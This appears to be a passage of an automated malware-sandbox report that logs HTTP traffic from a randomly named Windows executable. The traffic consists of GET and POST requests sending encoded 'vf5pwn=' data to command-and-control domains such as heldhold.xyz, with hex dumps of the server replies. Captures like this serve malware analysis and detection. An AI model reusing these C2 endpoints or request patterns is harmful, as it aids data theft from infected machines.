vf5pwn=TKQUtJlMp/1Fa5Z5E4iM+29EFdW7DSfAAf+t8el3keLwVgZL2XFBbYJksU86zcK6V9sAt0MsNdqSnIbs20C77mFkcXA/0I+lWXkkxdNgQJCWVnN4bEw+dxIfoT4BOFM/6fFjBPb9vPHw8vKL8zwUK3fc4iahbNp88qCnFHlkw9IMRl26ZMIpyA5Q2XzTYjtiuv85t3Ze5195TiROMtCb1+sFXqvZQ6FG1afcy8VnEdNFowSUjjqQqjKuUajuWJBEUAJDLkHxCNwhEJ0ii+ldFbRdGQBlX70eGFWq7cjzj4A08/zWDI3AV/q53Uic4+LITCKeeYQ2SRMWt3L8sO+lcRyJLQQi8vzpME1VdLw1dKGYb9tSMt3ePXrypnan/0YGUDDdDbwCnfnf4Wsawisuhumy6BsA2griXSUxyn2JW/NwjAmVCkgQzVidU165XMyAELTe5DctvwKL/S7kDXsO0SjiFdqg00SqjOzEw1v8Lk95kvvPFcjHy5126PK7xc/GLkssKvOP8IO44z22nlkI2e764iv3MqUOLVmy6/9GjfYJwiH6f5rc4ElA704ACuHYoFzm0Xr05mEOomd/5WaZBadvQf+2yZEXE/ARQN10tc+2mnTJ0pGdEYwhV7+QiBUxx3cp954U6fyVGuv3qJ0bMAGaRhLg71Q1NdfjRSIlHKn4HHYZ36MDI5e1JdrecrBZlBOd9N953TTcnNNA+dM7Iu0IJUTaVyP/SdYwfqJzZIp1gl7fd7233fXXddi2vFs7MhuA9jnQCtvHka0ffjmx18+MlRg9pJwWKWN/tFO3gyo+Z7ku8GlU6AWNEa4o00sn37EI3oDtCQlDtSvWI6W7b7OjMx5oijCqNYiX6/AarxpowHmWamF+t/wy2Uxeig+loraAJNGv0YQhnkSCXSjaogSCXksuyRwPRG/IznIsU/QTlWBWMNiSkKtxnFr62cBOg3KgAnl4UX9BsQVRZcd5Ku/mgqMF3tdf6mwNvAsNsNPBy [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.5497223.33.130.190802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:23:15.565221071 CEST531OUTGET /xamn/?vf5pwn=eI40u+kXl6dCNOxtOqaVh3t2St2MUXLKXPnA2oRVh57cb1FOyw5acKt1uSVkrtOGePUCnlUQIJS7kZjahSWR4W4fWnAv/fqpdm4W58wxIsvJOF8/cGdHH0QztCYqDUNhvQ==&lHul=nfQTqL40vDEpIp30 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.mgeducacaopro.online
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Sep 26, 2024 15:23:16.977345943 CEST416INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Thu, 26 Sep 2024 13:23:16 GMT
                                              Content-Type: text/html
                                              Content-Length: 276
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 76 66 35 70 77 6e 3d 65 49 34 30 75 2b 6b 58 6c 36 64 43 4e 4f 78 74 4f 71 61 56 68 33 74 32 53 74 32 4d 55 58 4c 4b 58 50 6e 41 32 6f 52 56 68 35 37 63 62 31 46 4f 79 77 35 61 63 4b 74 31 75 53 56 6b 72 74 4f 47 65 50 55 43 6e 6c 55 51 49 4a 53 37 6b 5a 6a 61 68 53 57 52 34 57 34 66 57 6e 41 76 2f 66 71 70 64 6d 34 57 35 38 77 78 49 73 76 4a 4f 46 38 2f 63 47 64 48 48 30 51 7a 74 43 59 71 44 55 4e 68 76 51 3d 3d 26 6c 48 75 6c 3d 6e 66 51 54 71 4c 34 30 76 44 45 70 49 70 33 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?vf5pwn=eI40u+kXl6dCNOxtOqaVh3t2St2MUXLKXPnA2oRVh57cb1FOyw5acKt1uSVkrtOGePUCnlUQIJS7kZjahSWR4W4fWnAv/fqpdm4W58wxIsvJOF8/cGdHH0QztCYqDUNhvQ==&lHul=nfQTqL40vDEpIp30"}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.54972467.223.117.189802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:23:22.129138947 CEST769OUTPOST /fava/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.heldhold.xyz
                                              Origin: http://www.heldhold.xyz
                                              Content-Length: 207
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.heldhold.xyz/fava/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 4c 41 72 35 71 39 4c 79 57 75 6f 35 4e 30 5a 50 59 48 74 39 58 66 65 4c 57 76 59 67 6e 62 51 70 47 34 43 52 46 53 73 39 76 56 39 51 56 46 6f 43 59 4c 41 78 41 6f 62 52 50 6e 6e 39 75 49 77 71 33 4a 77 37 66 44 42 32 4a 37 6b 4a 30 70 70 51 33 73 38 47 66 6a 51 50 6b 35 4f 64 4e 44 4f 4f 6a 57 4a 4b 6f 67 63 64 37 45 46 54 49 2f 74 51 64 5a 71 46 59 4b 77 36 78 7a 36 6e 47 50 4a 39 78 63 4f 32 66 76 51 71 58 74 2f 67 5a 76 67 78 71 43 53 73 45 44 44 2f 53 37 65 49 45 45 74 61 64 4e 36 67 75 51 4c 54 2b 65 52 68 58 66 4a 78 37 48 69 66 41 62 6b 30 50 4b 2b 4a 36 4e 5a 4e 6f 68 65 41 50 63 77 3d
                                              Data Ascii: vf5pwn=LAr5q9LyWuo5N0ZPYHt9XfeLWvYgnbQpG4CRFSs9vV9QVFoCYLAxAobRPnn9uIwq3Jw7fDB2J7kJ0ppQ3s8GfjQPk5OdNDOOjWJKogcd7EFTI/tQdZqFYKw6xz6nGPJ9xcO2fvQqXt/gZvgxqCSsEDD/S7eIEEtadN6guQLT+eRhXfJx7HifAbk0PK+J6NZNoheAPcw=
                                              Sep 26, 2024 15:23:22.709606886 CEST1236INHTTP/1.1 404 Not Found
                                              Date: Thu, 26 Sep 2024 13:23:22 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 32106
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                              Sep 26, 2024 15:23:22.709640026 CEST1236INData Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                                              Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL -->
                                              Sep 26, 2024 15:23:22.709655046 CEST448INData Raw: 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20
                                              Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-scre
                                              Sep 26, 2024 15:23:22.709822893 CEST1236INData Raw: 74 68 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 66 61 62 6c 65 73 2d 74 6f 70 2d 68 65 61 64 65 72 2d 73 69 67 6e 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20
                                              Data Ascii: th-background-color fables-top-header-signin"> <div class="container"> <div class="row" id="top-row"> <div class="col-12 col-sm-2 col-lg-5"> <div class="dropdown"> <button class="btn bt
                                              Sep 26, 2024 15:23:22.709830046 CEST1236INData Raw: 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 74 68 69 72 64 2d 74 65 78 74 2d 63 6f 6c 6f 72 20 66 6f 6e 74 2d 31 33 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 69 63 6f 6e 70 68 6f 6e 65 22 3e 3c 2f 73 70 61
                                              Data Ascii: <p class="fables-third-text-color font-13"><span class="fables-iconphone"></span> Phone : (888) 6000 6000 - (888) 6000 6000</p> </div> <div class="col-12 col-sm-5 col-lg-3 text-right"> <p class="fabl
                                              Sep 26, 2024 15:23:22.710150003 CEST1236INData Raw: 6f 6e 20 74 65 78 74 2d 77 68 69 74 65 20 66 6f 6e 74 2d 31 36 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: on text-white font-16"></span> </button> <div class="collapse navbar-collapse" id="fablesNavDropdown"> <ul class="navbar-nav mx-auto fables-nav">
                                              Sep 26, 2024 15:23:22.710156918 CEST1236INData Raw: 70 64 6f 77 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65
                                              Data Ascii: pdown"> <a class="nav-link dropdown-toggle" href="#" id="sub-nav2" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> Features
                                              Sep 26, 2024 15:23:22.710163116 CEST896INData Raw: 6c 22 3e 48 65 61 64 65 72 20 4d 65 67 61 20 6d 65 6e 75 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: l">Header Mega menu</a></li> </ul> </li> <li><a class="dropdown-item dropdown-toggl
                                              Sep 26, 2024 15:23:22.710556984 CEST1236INData Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20
                                              Data Ascii: > <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">
                                              Sep 26, 2024 15:23:22.710571051 CEST1236INData Raw: 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64
                                              Data Ascii: ></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul>
                                              Sep 26, 2024 15:23:22.714574099 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Footer 1</a>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.54972567.223.117.189802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:23:24.677985907 CEST789OUTPOST /fava/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.heldhold.xyz
                                              Origin: http://www.heldhold.xyz
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.heldhold.xyz/fava/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 4c 41 72 35 71 39 4c 79 57 75 6f 35 4e 55 70 50 55 41 5a 39 43 76 65 45 63 50 59 67 2b 4c 51 58 47 34 47 52 46 51 42 34 73 6a 4e 51 56 6e 77 43 5a 50 55 78 42 6f 62 52 58 58 6e 38 6a 6f 77 74 33 4a 38 4a 66 43 39 32 4a 37 77 4a 30 70 5a 51 33 66 45 46 66 7a 51 4e 2f 4a 50 62 4a 44 4f 4f 6a 57 4a 4b 6f 67 59 6e 37 45 64 54 49 50 39 51 50 4e 2b 43 65 36 77 31 77 7a 36 6e 4c 76 4a 35 78 63 50 6a 66 72 51 45 58 76 33 67 5a 71 45 78 71 7a 53 76 4e 44 44 44 4e 72 66 69 4b 6c 51 44 62 38 4c 68 76 53 43 79 70 76 4e 2b 53 70 6b 62 68 6c 71 33 54 37 49 4d 66 5a 32 2b 72 39 34 6b 79 43 4f 77 52 4c 6b 57 61 6f 2b 75 57 72 5a 54 74 7a 74 34 37 6f 43 32 30 50 2b 4c
                                              Data Ascii: vf5pwn=LAr5q9LyWuo5NUpPUAZ9CveEcPYg+LQXG4GRFQB4sjNQVnwCZPUxBobRXXn8jowt3J8JfC92J7wJ0pZQ3fEFfzQN/JPbJDOOjWJKogYn7EdTIP9QPN+Ce6w1wz6nLvJ5xcPjfrQEXv3gZqExqzSvNDDDNrfiKlQDb8LhvSCypvN+Spkbhlq3T7IMfZ2+r94kyCOwRLkWao+uWrZTtzt47oC20P+L
                                              Sep 26, 2024 15:23:25.261872053 CEST1236INHTTP/1.1 404 Not Found
                                              Date: Thu, 26 Sep 2024 13:23:25 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 32106
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                              Sep 26, 2024 15:23:25.262027979 CEST1236INData Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                                              Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL -->
                                              Sep 26, 2024 15:23:25.262186050 CEST448INData Raw: 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20
                                              Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-scre
                                              Sep 26, 2024 15:23:25.262192011 CEST1236INData Raw: 74 68 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 66 61 62 6c 65 73 2d 74 6f 70 2d 68 65 61 64 65 72 2d 73 69 67 6e 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20
                                              Data Ascii: th-background-color fables-top-header-signin"> <div class="container"> <div class="row" id="top-row"> <div class="col-12 col-sm-2 col-lg-5"> <div class="dropdown"> <button class="btn bt
                                              Sep 26, 2024 15:23:25.262511969 CEST224INData Raw: 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 74 68 69 72 64 2d 74 65 78 74 2d 63 6f 6c 6f 72 20 66 6f 6e 74 2d 31 33 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 69 63 6f 6e 70 68 6f 6e 65 22 3e 3c 2f 73 70 61
                                              Data Ascii: <p class="fables-third-text-color font-13"><span class="fables-iconphone"></span> Phone : (888) 6000 6000 - (888) 6000 6000</p> </div> <div class="col-12 col-sm-5 col-lg-3 text-right">
                                              Sep 26, 2024 15:23:25.262516975 CEST1236INData Raw: 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 74 68 69 72 64 2d 74 65 78 74 2d 63 6f 6c 6f 72 20 66 6f 6e 74 2d 31 33 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 69 63 6f 6e 65 6d 61 69 6c 22 3e 3c 2f 73
                                              Data Ascii: <p class="fables-third-text-color font-13"><span class="fables-iconemail"></span> Email: Design@domain.com</p> </div> </div> </div></div> ... /End Top Header -->... Start Fables Navigation --><
                                              Sep 26, 2024 15:23:25.262528896 CEST224INData Raw: 61 62 6c 65 73 2d 6e 61 76 22 3e 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 22 3e 0a
                                              Data Ascii: ables-nav"> <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" href="#" id="sub-nav1" data-toggle="dropdown" aria-haspopup="true"
                                              Sep 26, 2024 15:23:25.262662888 CEST1236INData Raw: 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20
                                              Data Ascii: aria-expanded="false"> Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1">
                                              Sep 26, 2024 15:23:25.262670994 CEST224INData Raw: 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63
                                              Data Ascii: toggle" href="#">Headers</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a>
                                              Sep 26, 2024 15:23:25.262681961 CEST1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22
                                              Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header1-transparent.html">Header 1 Transparent</a></li>
                                              Sep 26, 2024 15:23:25.267330885 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 32 2d 64 61 72 6b 2e 68 74 6d 6c 22
                                              Data Ascii: <li><a class="dropdown-item" href="header2-dark.html">Header 2 Dark</a></li> </ul> </li>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.54972667.223.117.189802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:23:27.226273060 CEST1806OUTPOST /fava/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.heldhold.xyz
                                              Origin: http://www.heldhold.xyz
                                              Content-Length: 1243
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.heldhold.xyz/fava/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 4c 41 72 35 71 39 4c 79 57 75 6f 35 4e 55 70 50 55 41 5a 39 43 76 65 45 63 50 59 67 2b 4c 51 58 47 34 47 52 46 51 42 34 73 6a 46 51 56 55 34 43 59 75 55 78 48 59 62 52 4a 6e 6e 68 6a 6f 77 77 33 4a 30 4e 66 43 77 4c 4a 35 49 4a 30 49 35 51 2f 4f 45 46 55 7a 51 4e 67 35 50 4c 4e 44 4f 62 6a 57 5a 47 6f 67 49 6e 37 45 64 54 49 4e 31 51 4d 5a 71 43 46 36 77 36 78 7a 36 6a 47 50 4a 52 78 63 47 59 66 72 63 36 58 66 58 67 59 4b 30 78 35 78 71 76 43 44 44 42 4f 72 66 36 4b 6c 63 6d 62 38 57 61 76 54 47 55 70 6f 68 2b 52 2f 45 4e 30 47 61 2f 41 72 63 56 54 35 75 67 31 5a 6c 46 79 51 53 30 5a 59 51 71 47 36 79 75 42 63 68 4b 68 79 6b 4f 69 76 79 47 2b 4b 7a 2b 32 61 6d 59 72 43 51 44 39 30 50 6c 35 43 45 65 7a 65 6e 79 49 4f 61 71 66 36 49 76 33 4a 37 68 4d 6e 65 50 74 34 39 55 65 67 68 35 50 39 6b 6d 62 49 63 4d 5a 33 37 4a 41 58 77 58 53 6b 5a 38 5a 6c 6a 6d 39 72 6b 67 4b 30 56 6e 58 58 